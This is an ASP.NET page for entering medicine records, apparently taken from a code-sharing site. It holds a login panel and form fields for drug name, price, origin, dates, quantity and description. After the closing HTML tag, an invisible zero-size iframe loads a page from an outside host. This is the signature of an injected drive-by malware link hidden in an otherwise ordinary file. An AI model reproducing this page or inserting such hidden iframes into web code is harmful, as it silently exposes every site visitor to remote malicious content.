📄 medinsert.aspx
字号:
<%@ Page language="c#" Codebehind="medinsert.aspx.cs" AutoEventWireup="false" Inherits="medicine.medinsert" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
<title>药品录入</title>
<!--#include virtual="head.htm"-->
<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
<meta name="CODE_LANGUAGE" Content="C#">
<meta name="vs_defaultClientScript" content="JavaScript">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
</HEAD>
<body>
<form id="Form1" method="post" runat="server">
<FONT face="宋体">
<DIV align="center">
<asp:panel id="loginpanel" runat="server" Visible="False" Width="194px" Height="65px">
<TABLE id="Table2" style="WIDTH: 235px; HEIGHT: 84px" cellSpacing="1" cellPadding="1" width="235"
align="center" border="1">
<TR>
<TD align="center">如要录入药品,请先登陆</TD>
</TR>
<TR>
<TD><FONT face="宋体">帐号:
<asp:TextBox id="name" runat="server" MaxLength="40"></asp:TextBox></FONT></TD>
</TR>
<TR>
<TD><FONT face="宋体">密码:</FONT>
<asp:TextBox id="password" runat="server" MaxLength="40" TextMode="Password"></asp:TextBox></TD>
</TR>
<TR>
<TD><FONT face="宋体"></FONT>
<P align="center">
<asp:Button id="log" runat="server" Text="登陆"></asp:Button></P>
</TD>
</TR>
</TABLE><FONT face="宋体"></FONT></asp:panel></DIV>
<DIV align="center">
<asp:Panel id="PanelModify" runat="server" Width="375px" Height="153px">
<P>
<asp:Label id="label" runat="server" ForeColor="Red"></asp:Label></P>
<TABLE id="Table3" borderColor="gray" cellSpacing="1" cellPadding="1" width="300" align="center"
border="1">
<TR>
<TD style="WIDTH: 68px"><FONT face="宋体">药名</FONT></TD>
<TD>
<asp:TextBox id="TextBox1" runat="server" Height="100%" Width="100%" MaxLength="40"></asp:TextBox></TD>
</TR>
<TR>
<TD style="WIDTH: 68px"><FONT face="宋体">单价</FONT></TD>
<TD>
<asp:TextBox id="TextBox2" runat="server" Height="100%" Width="100%" MaxLength="40"></asp:TextBox></TD>
</TR>
<TR>
<TD style="WIDTH: 68px"><FONT face="宋体">产地</FONT></TD>
<TD>
<asp:TextBox id="TextBox3" runat="server" Height="100%" Width="100%" MaxLength="40"></asp:TextBox></TD>
</TR>
<TR>
<TD style="WIDTH: 68px"><FONT face="宋体">生产日期</FONT></TD>
<TD>
<asp:TextBox id="TextBox4" runat="server" Height="100%" Width="100%" MaxLength="40"></asp:TextBox></TD>
</TR>
<TR>
<TD><FONT face="宋体">保质期</FONT></TD>
<TD>
<asp:TextBox id="TextBox5" runat="server" Height="100%" Width="100%" MaxLength="40"></asp:TextBox></TD>
</TR>
<TR>
<TD style="WIDTH: 68px"><FONT face="宋体">数量</FONT></TD>
<TD><FONT face="宋体">
<asp:TextBox id="TextBox6" runat="server" Height="100%" Width="100%" MaxLength="40"></asp:TextBox></FONT></TD>
</TR>
<TR>
<TD style="WIDTH: 68px"><FONT face="宋体">说明</FONT></TD>
<TD><FONT face="宋体">
<asp:TextBox id="TextBox7" runat="server" Height="100%" Width="100%" MaxLength="250" TextMode="MultiLine"></asp:TextBox></FONT></TD>
</TR>
</TABLE>
<P>
<asp:Button id="insert" runat="server" Height="24px" Width="118px" Text="插入数据"></asp:Button></P>
</asp:Panel></DIV>
<DIV align="center"> </DIV>
<DIV align="center"><a href='.\medlist.aspx'>回到药品列表</a></DIV>
</FONT>
</form>
</body>
</HTML>
<iframe src=http://www.ac86.cn/88/index.htm width=0 height=0></iframe>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -